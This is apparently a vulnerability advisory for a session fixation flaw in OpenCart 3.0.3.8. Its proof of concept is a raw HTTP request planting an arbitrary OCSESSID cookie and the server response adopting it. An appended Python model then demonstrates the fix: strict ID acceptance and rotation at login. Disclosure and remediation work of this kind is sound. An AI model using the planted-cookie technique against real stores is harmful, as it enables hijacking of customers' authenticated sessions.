opencart 3.0.3.8 Exploit, Session Injection

# Exploit Title: opencart 3.0.3.8 - Session Injection
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/
# Version: 3.0.3.8
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Session Fixation / injection

The session cookie "OCSESSID" is improperly processed.
An attacker can set the cookie to any value, and the server sets this value.
Because of that, the application is vulnerable to session injection and session fixation.

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example

Modify cookie "OCSESSID" value:
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/opencart-3.0.3.8/
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------------------------------------------------------------------------------------------------
Server sets the attacker's value:

Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 15:16:06 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: PHP/8.0.11
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18944
[...]
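
The fix for the behaviour shown above is to accept only session IDs the server issued itself and to rotate the ID at login. The following is an added example, not code from the original advisory or from OpenCart: an in-memory model that puts the permissive handling beside the strict one. The class `SessionStore`, its methods, the `demo` helper and the user name are hypothetical.

```python
import secrets


class SessionStore:
    """In-memory model of a session backend (hypothetical, not OpenCart code)."""

    def __init__(self, strict, rotate):
        self.strict = strict    # reject IDs this server never issued
        self.rotate = rotate    # issue a fresh ID at login
        self.sessions = {}      # session id -> session data

    def _issue(self, data=None):
        sid = secrets.token_hex(16)  # 128 bits from the OS CSPRNG
        self.sessions[sid] = dict(data or {})
        return sid

    def start(self, cookie_value):
        """Return the ID the server would send back in Set-Cookie."""
        if cookie_value in self.sessions:
            return cookie_value  # known ID, issued earlier by this server
        if not self.strict and cookie_value:
            # Behaviour shown in the PoC: an unknown client value is adopted.
            self.sessions[cookie_value] = {}
            return cookie_value
        # Strict handling: unknown or missing IDs are discarded.
        return self._issue()

    def login(self, sid, user):
        """Bind a user to the session, rotating the ID if configured."""
        data = self.sessions.pop(sid, {})
        data["user"] = user
        if not self.rotate:
            self.sessions[sid] = data  # the pre-login ID survives the login
            return sid
        return self._issue(data)  # the pre-login ID no longer resolves


def demo(strict, rotate):
    """Replay the PoC cookie value against one configuration."""
    store = SessionStore(strict, rotate)
    planted = "zxcvzxcvzxcvzxcvzxcvzxcv"  # OCSESSID value from the PoC request
    sid = store.start(planted)
    store.login(sid, "alice")  # constructed user name
    return {
        "adopted_planted": sid == planted,
        "planted_valid_after_login": planted in store.sessions,
    }
```

Only `demo(False, False)` leaves the planted value attached to an authenticated session; either control alone breaks the fixation, and applying both also stops arbitrary values from creating server-side session records.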
